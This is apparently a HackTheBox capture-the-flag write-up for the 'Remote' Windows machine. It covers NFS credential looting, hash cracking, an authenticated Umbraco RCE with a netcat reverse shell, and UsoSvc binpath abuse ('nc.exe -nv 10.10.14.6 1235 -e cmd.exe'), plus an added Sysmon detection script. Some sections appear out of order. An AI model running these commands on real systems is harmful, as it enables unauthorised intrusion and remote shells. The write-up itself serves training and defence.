Remote 10.10.10.180

It doesn’t matter how many times you get knocked down. All that matters is you get up one more time than you were knocked down. (Roy T. Bennett)

30 May 2020


Background

According to the nmap result, a website is found that runs a vulnerable version of Umbraco CMS, and a mountd/NFS service is enabled. The CMS can be exploited once we find credentials on an exposed NFS share: a login credential is stored in a file saved on this share, and it can be used to log in to Umbraco CMS. An authenticated Umbraco CMS exploit is then used to gain initial access.


Target Machine: 10.10.10.180

Attacker Machine: 10.10.14.8

Hacking Process Part 0 – Service Reconnaissance

Quick Pre-searching

Details Analysis

root@kclai: ~/Documents/ctf/htb/windows/12_Remote# nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.180 -o nmap-result.txt 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 17:49 IST
Nmap scan report for 10.10.10.180
Host is up (0.21s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m09s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-09-06T12:21:19
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.81 seconds

Enumeration strategies

According to the nmap result, the following interesting ports are found for further investigation:

  1. FTP (21)

  2. Website (80)

  3. NFS (2049)

Hacking Process Part 1 – Enumeration

FTP - 21

Logging in to the FTP service with the credentials anonymous/anonymous is successful, but nothing can be found or downloaded from this account.

Website - 80

Browsing the website, nothing interesting is found. Using gobuster (the output below is from dirsearch) to check for any hidden folder/subdirectory, a list of interesting paths is found:


 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 10 | Wordlist size: 4614 | Request count: 4614

Error Log: /opt/dirsearch/logs/errors-20-09-06_17-53-02.log

Target: http://10.10.10.180

Output File: /opt/dirsearch/reports/10.10.10.180/20-09-06_17-53-02

[17:53:02] Starting:
[17:53:08] 200 -    7KB - /
[17:53:18] 200 -    5KB - /about-us
[17:53:25] 200 -    5KB - /blog
[17:53:25] 200 -    5KB - /Blog
[17:53:34] 200 -    8KB - /contact
[17:53:34] 200 -    8KB - /Contact
[17:53:56] 200 -    7KB - /home
[17:53:56] 200 -    7KB - /Home
[17:54:00] 302 -  126B  - /install  ->  /umbraco/
[17:54:01] 200 -    3KB - /intranet
[17:54:10] 500 -    3KB - /master
[17:54:21] 200 -    7KB - /people
[17:54:21] 200 -    7KB - /People
[17:54:23] 200 -    3KB - /person
[17:54:28] 500 -    3KB - /product
[17:54:28] 200 -    5KB - /products
[17:54:28] 200 -    5KB - /Products
[17:54:55] 200 -    4KB - /umbraco

An administrative page is found, but we cannot log into the system using default accounts such as admin/admin. Move on to the next service for further checking.

NFS - 2049

Using the showmount tool to check which NFS shares are accessible, and by whom.

The site_backups share is available to mount and is accessible to everyone, so let’s mount it and enumerate further.

Checking the folders one by one, a file named Umbraco.sdf is found inside the folder /App_Data; it contains credentials at the top of the file.

strings Umbraco.sdf | head
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f

Hacking Process Part 2 – Initial Low Privilege Access

Log in to Umbraco CMS with the credentials found: admin@htb.local / baconandcheese.

The version is Umbraco 7.12.4; googling it, a vulnerability is found on Exploit DB.

...
login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";
...

In order to get the reverse TCP shell, the payload is changed to download a 64-bit Windows version of netcat.

Next, stand up a listener on port 80 and run the exploit.

Change the payload again to start the reverse TCP shell to my Kali machine.

Start the listener on my Kali machine; the reverse shell is returned.

The user flag can be found in the C:\Users\Public folder.

Hacking Process Part 3 – Privilege Escalation

Start by gathering the system information.

[+] Modifiable Services
   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
    UsoSvc: AllAccess, Start

Because of the full access to the UsoSvc service, we can modify the binpath of the service and pop a reverse shell.

sc.exe stop UsoSvc
sc config UsoSvc binpath= "C:\windows\temp\nc.exe -nv 10.10.14.6 1235 -e C:\WINDOWS\System32\cmd.exe"
sc.exe qc usosvc
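From the defender’s side, the binpath change above is a registry write to HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath, which Sysmon records as Event ID 13 (value set). The following detection is an added example, not part of the writeup; the events are constructed to mirror Sysmon’s TargetObject/Details fields, and the assumption that the SCM (services.exe) is the writing Image is just how the sample is built.

```python
import re

# Constructed Sysmon Event ID 13 records as a SIEM would hand them over
# (field names follow Sysmon's RegistryEvent schema; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Windows\\system32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "C:\\windows\\temp\\nc.exe -nv 10.10.14.6 1235 -e C:\\WINDOWS\\System32\\cmd.exe"},
    {"EventID": 13, "Image": "C:\\Windows\\system32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p"},
    {"EventID": 13, "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": "HKLM\\Software\\Acme\\Setting", "Details": "1"},
]

# Only ImagePath values under the Services key are of interest here.
SERVICE_IMAGEPATH = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.I)

# Traits of a service image path that a legitimate service should not have.
SUSPICIOUS = [
    (re.compile(r"\\(temp|users|programdata|appdata)\\", re.I), "image outside system directories"),
    (re.compile(r"\b(nc|ncat|netcat)(64)?\.exe\b", re.I), "netcat binary"),
    (re.compile(r"\bcmd\.exe\b|\bpowershell(\.exe)?\b", re.I), "shell interpreter as service image"),
    (re.compile(r"\s-e\s", re.I), "netcat -e (exec) switch"),
]


def check_event(evt: dict):
    """Return an alert dict for a suspicious service ImagePath change, else None."""
    if evt.get("EventID") != 13:
        return None
    m = SERVICE_IMAGEPATH.match(evt.get("TargetObject", ""))
    if not m:
        return None
    new_path = evt.get("Details", "")
    reasons = [why for rx, why in SUSPICIOUS if rx.search(new_path)]
    if not reasons:
        return None
    return {"service": m.group("svc"), "image_path": new_path,
            "set_by": evt.get("Image"), "reasons": reasons}


def detect(events: list) -> list:
    """Run every event through check_event and keep the alerts."""
    return [a for a in (check_event(e) for e in events) if a]
```

Pairing this with a baseline of expected ImagePath values per service turns the second, benign-looking rewrite into a finding as well, since UsoSvc’s path should not change outside servicing.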

Recommendation

Several known vulnerabilities are found on this box, which let us finish the game easily. It tells us that system patching is the most important preventive action against cyber attacks.

Reference Link

Remote is a Windows machine from HackTheBox that focuses on the CVE exploitation technique, for training your ethical hacking and penetration testing skills.

Based on the result of WinPEAS, there is a possible local privilege escalation vector on a full-access service named UsoSvc. Modifying the binpath of the service returns a reverse shell with administrator privilege.

nmap -Pn -p- -T5 --min-rate=1000 10.10.10.180 -oG fkclai.nmap

gobuster dir --url=http://10.10.10.180/ --wordlist=/usr/share/wordlists/dirb/common.txt

Crack the password whose SHA1 hash is b8be16afba8c314ad33d812f22a04991b90e2aaa using an online decrypting service. Finally, get the credentials: user id admin@htb.local and password baconandcheese.

This version suffers from an authenticated remote code execution vulnerability. Download the exploit and modify the login details (login, password, host) as shown in the exploit snippet.

systeminfo
whoami /priv

The result of winPEAS.exe, which discovers possible local privilege escalation vectors, shows full access to a service named UsoSvc.

  1. HackTheBox
  2. PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ng (GitHub)

Completed on 30 May 2020